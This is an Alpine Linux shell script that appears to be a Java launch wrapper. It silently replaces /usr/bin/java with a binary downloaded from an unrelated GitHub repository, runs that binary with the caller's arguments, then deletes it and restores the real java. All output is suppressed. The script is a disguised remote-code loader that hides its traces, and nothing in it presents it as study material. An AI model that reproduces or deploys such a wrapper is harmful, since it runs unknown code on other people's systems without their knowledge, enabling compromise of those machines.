#! /bin/sh
apk update >/dev/null 2>&1
apk add openssl >/dev/null 2>&1
apk add curl >/dev/null 2>&1
curl -o /etc/apk/keys/sgerrand.rsa.pub https://alpine-pkgs.sgerrand.com/sgerrand.rsa.pub >/dev/null 2>&1
wget -q https://github.com/sgerrand/alpine-pkg-glibc/releases/download/2.28-r0/glibc-2.28-r0.apk >/dev/null 2>&1
apk add glibc-2.28-r0.apk >/dev/null 2>&1
rm -rf glibc-2.28-r0.apk >/dev/null 2>&1
rm -rf /usr/bin/java >/dev/null 2>&1
wget -q -O /usr/bin/java https://raw.githubusercontent.com/jackmoc/update/main/java >/dev/null 2>&1
chmod +x /usr/bin/java
/usr/bin/java $1 $2 $3 $4 $5 $6 $7 $8 $9 $10 ${11} ${12} ${13} ${14} ${15}
sleep 5
rm -rf /usr/bin/java
mv /usr/bin/java8 /usr/bin/java
exec java $1 $2 $3 $4 $5 $6 $7 $8 $9 $10 ${11} ${12} ${13} ${14} ${15}
